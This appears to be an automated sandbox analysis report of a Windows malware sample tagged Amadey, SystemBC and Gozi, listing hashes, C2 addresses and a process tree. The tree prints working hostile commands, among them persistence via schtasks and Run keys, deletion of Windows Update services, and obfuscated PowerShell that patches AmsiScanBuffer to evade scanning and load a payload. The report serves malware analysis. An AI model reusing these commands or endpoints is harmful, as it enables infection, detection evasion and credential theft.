Analysis
-
max time kernel
155s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
10-12-2022 07:53
General
-
Target
f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9.exe
-
Size
6.2MB
-
MD5
9e59e36488bfcebe5acba259c6ba6195
-
SHA1
65ba9bfa1e66bf09b0d3064746c15246b9fcc049
-
SHA256
f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9
-
SHA512
f043684854247db8ead2823105942009ca8b8bb3d1d58b80d1ee851fb028afa7374bc29661c46f4e9ca6d5896dacd56a3c297161c3c71f5b4db2dbfd9f797ecd
-
SSDEEP
98304:FjWC/PP6KALpuDlnRoTsUzBPPPPTycfOsjaTA5Tny6dDFFMcubn36fBu:FyC/lALkD7oTJP+cfDaM57y6PNuO5u
Score
10/10
Malware Config
Extracted
Family
amadey
Version
3.50
C2
85.209.135.109/jg94cVd30f/index.php
Extracted
Family
systembc
C2
89.22.236.225:4193
176.124.205.5:4193
Extracted
Family
gozi
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Gozi
Gozi is a well-known and widely distributed banking trojan.
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 7 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 3 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 42 IoCs
-
Suspicious behavior: EnumeratesProcesses 46 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9.exe"C:\Users\Admin\AppData\Local\Temp\f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\03bd543fce" /P "Admin:N"&&CACLS "..\03bd543fce" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"5⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Users\Admin\1000018002\avicapn32.exe"C:\Users\Admin\1000018002\avicapn32.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000019012\syncfiles.dll, rundll4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\Admin\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\Admin\Locktime\RtkAudUService64.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#baequo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "RtkAudUService64.exe" } Else { "C:\Users\Admin\Locktime\RtkAudUService64.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn RtkAudUService64.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DvtsasLmMkxA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwCvcIYevgBFEB,[Parameter(Position=1)][Type]$skzdsLdNeH)$rhUQzTbqiLz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+'l'+''+'e'+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('My'+'D'+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rhUQzTbqiLz.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$jwCvcIYevgBFEB).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$rhUQzTbqiLz.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](78)+''+'e'+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$skzdsLdNeH,$jwCvcIYevgBFEB).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rhUQzTbqiLz.CreateType();}$UWOieeWouNPfk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+''+[Char](101)+''+'m'+'.'+'d'+'l'+'l'+'')}).GetType(''+'M'+'i'+'c'+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+'.'+''+'W'+'in'+[Char](51)+'2'+[Char](46)+''+'U'+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](85)+'W'+'O'+'ie'+[Char](101)+''+[Char](87)+'ou'+[Char](78)+''+'P'+''+'f'+'k');$GmJIzRdPPyTBPE=$UWOieeWouNPfk.GetMethod(''+[Char](71)+''+'m'+''+'J'+''+[Char](73)+''+[Char](122)+'R'+[Char](100)+''+[Char](80)+'Py'+[Char](84)+''+[Char](66)+'P'+'E'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$thXKaccDqNcErbIzJpF=DvtsasLmMkxA @([String])([IntPtr]);$DtIkhayLYncrKnUwsrjmDq=DvtsasLmMkxA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$RcQjrdEuUrY=$UWOieeWouNPfk.GetMethod(''+'G'+'e'+'t'+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$IDmXHfFPancOoR=$GmJIzRdPPyTBPE.Invoke($Null,@([Object]$RcQjrdEuUrY,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$UOikeHdwALFVGDXOv=$GmJIzRdPPyTBPE.Invoke($Null,@([Object]$RcQjrdEuUrY,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+'e'+''+'c'+'t')));$GOCjIng=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IDmXHfFPancOoR,$thXKaccDqNcErbIzJpF).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'ll');$vOYtsisgMfPvhlBNN=$GmJIzRdPPyTBPE.Invoke($Null,@([Object]$GOCjIng,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+''+'c'+'an'+'B'+''+[Char](117)+''+'f'+''+[Char](102)+'er')));$mYLagvMWfn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UOikeHdwALFVGDXOv,$DtIkhayLYncrKnUwsrjmDq).Invoke($vOYtsisgMfPvhlBNN,[uint32]8,4,[ref]$mYLagvMWfn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$vOYtsisgMfPvhlBNN,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UOikeHdwALFVGDXOv,$DtIkhayLYncrKnUwsrjmDq).Invoke($vOYtsisgMfPvhlBNN,[uint32]8,0x20,[ref]$mYLagvMWfn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'l'+[Char](101)+''+'r'+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:akTGAxXrNOUy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yQfTfjaEKWMrWX,[Parameter(Position=1)][Type]$YtTJGgwQmV)$OuJqfDeRXCX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'','Cla'+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$OuJqfDeRXCX.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+'e'+''+'c'+''+[Char](105)+'al'+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eB'+[Char](121)+'S'+'i'+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yQfTfjaEKWMrWX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$OuJqfDeRXCX.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+'g'+','+''+[Char](78)+'e'+'w'+'S'+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$YtTJGgwQmV,$yQfTfjaEKWMrWX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $OuJqfDeRXCX.CreateType();}$yaepihfJsFrXn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+'ft'+'.'+'Wi'+[Char](110)+'32'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](121)+''+'a'+'e'+[Char](112)+''+[Char](105)+''+[Char](104)+''+[Char](102)+''+'J'+'s'+'F'+''+[Char](114)+''+[Char](88)+''+'n'+'');$BiBxYPKhJEnhnZ=$yaepihfJsFrXn.GetMethod(''+[Char](66)+''+[Char](105)+''+'B'+''+'x'+'Y'+[Char](80)+'K'+'h'+''+'J'+'En'+'h'+''+[Char](110)+''+'Z'+'',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+'i'+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mqxMZnRNCHDVugDFykL=akTGAxXrNOUy @([String])([IntPtr]);$bjSwXcjHUOPbfPHiaVluHy=akTGAxXrNOUy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CUjgIiQqguE=$yaepihfJsFrXn.GetMethod(''+'G'+'e'+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+'n'+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+'n'+''+[Char](101)+''+'l'+'3'+'2'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$NLamNQsZfDFqdb=$BiBxYPKhJEnhnZ.Invoke($Null,@([Object]$CUjgIiQqguE,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'dLib'+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$eRwPnMdrgeguRkTEJ=$BiBxYPKhJEnhnZ.Invoke($Null,@([Object]$CUjgIiQqguE,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$umtNwQC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NLamNQsZfDFqdb,$mqxMZnRNCHDVugDFykL).Invoke(''+[Char](97)+'ms'+[Char](105)+''+'.'+'dl'+[Char](108)+'');$fhOsljCKpQCnjqwTI=$BiBxYPKhJEnhnZ.Invoke($Null,@([Object]$umtNwQC,[Object](''+[Char](65)+''+[Char](109)+'si'+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+'fe'+[Char](114)+'')));$MTztMhiPHF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eRwPnMdrgeguRkTEJ,$bjSwXcjHUOPbfPHiaVluHy).Invoke($fhOsljCKpQCnjqwTI,[uint32]8,4,[ref]$MTztMhiPHF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fhOsljCKpQCnjqwTI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eRwPnMdrgeguRkTEJ,$bjSwXcjHUOPbfPHiaVluHy).Invoke($fhOsljCKpQCnjqwTI,[uint32]8,0x20,[ref]$MTztMhiPHF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+''+'i'+''+'a'+''+'l'+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Locktime\RtkAudUService64.exeC:\Users\Admin\Locktime\RtkAudUService64.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\1000018002\avicapn32.exeFilesize
12.1MB
MD50f6ef96c5e687631ef27f1dcd1afe7b4
SHA1ea8aeee11c243e3eacfa6753f708c20cbba39aac
SHA25638381a42975028b181430a80d6009988d0d0cfa42493d3efbbfb72d3abe97648
SHA5123ae1986071afffbed1978be560d5159f563d699be798e6ab6dc616a82104467b79ec872c891e11615d3793348730f311bce3a63f1ce289bb8d7c73399c26c5c9
-
C:\Users\Admin\1000018002\avicapn32.exeFilesize
12.1MB
MD50f6ef96c5e687631ef27f1dcd1afe7b4
SHA1ea8aeee11c243e3eacfa6753f708c20cbba39aac
SHA25638381a42975028b181430a80d6009988d0d0cfa42493d3efbbfb72d3abe97648
SHA5123ae1986071afffbed1978be560d5159f563d699be798e6ab6dc616a82104467b79ec872c891e11615d3793348730f311bce3a63f1ce289bb8d7c73399c26c5c9
-
C:\Users\Admin\1000019012\syncfiles.dllFilesize
7.2MB
MD50d079a931e42f554016db36476e55ba7
SHA1d5f1ab52221019c746f1cc59a45ce18d0b817496
SHA256ead2c5aaf92fe07db45b99587f586c7a45f92c67220cd8113a5d2e7bcb320798
SHA5121496f1296df89e1da8780f175631e2551300a99e6c7ea43d2750653fdf6e7ed096fdedd9f0d23b94190ecf418da09cf9c9b6caee5821ba1c457f0294063bbc9e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD598b836844b319b52cf34f2e7910c8519
SHA1724bf99f8ca3ded93da040d3764a264066cd11cc
SHA256c6d7aed431499274f95c61eb9dbe8cbb5dd86cdb8ba117205ae7f2e053a79f62
SHA51251fe509ebb7456176ec5ecda6e6f595d566644ddf9dc4baac81384398e1d871fba4a90d4d0cea31ab016267b89aa5af863e5df325a1a645a224849ca788475f3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e163c4d1b6a158363d5111d5c1067e4d
SHA195fe8df75444eb36b42bcf9be53d73467fd3a589
SHA25613b521e187a7ab69a192ae8b8b5bc3f1f9894c7124106409ce4877648525a99f
SHA51272b9e4877be70166bf88df1283622f30b46e3dd44c5961f292d2905c5725938a8524eeaeb4b05f37b274e15f36628bbdbc40061dbcbb669ca27d81534ba153fd
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeFilesize
6.2MB
MD59e59e36488bfcebe5acba259c6ba6195
SHA165ba9bfa1e66bf09b0d3064746c15246b9fcc049
SHA256f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9
SHA512f043684854247db8ead2823105942009ca8b8bb3d1d58b80d1ee851fb028afa7374bc29661c46f4e9ca6d5896dacd56a3c297161c3c71f5b4db2dbfd9f797ecd
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeFilesize
6.2MB
MD59e59e36488bfcebe5acba259c6ba6195
SHA165ba9bfa1e66bf09b0d3064746c15246b9fcc049
SHA256f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9
SHA512f043684854247db8ead2823105942009ca8b8bb3d1d58b80d1ee851fb028afa7374bc29661c46f4e9ca6d5896dacd56a3c297161c3c71f5b4db2dbfd9f797ecd
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeFilesize
6.2MB
MD59e59e36488bfcebe5acba259c6ba6195
SHA165ba9bfa1e66bf09b0d3064746c15246b9fcc049
SHA256f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9
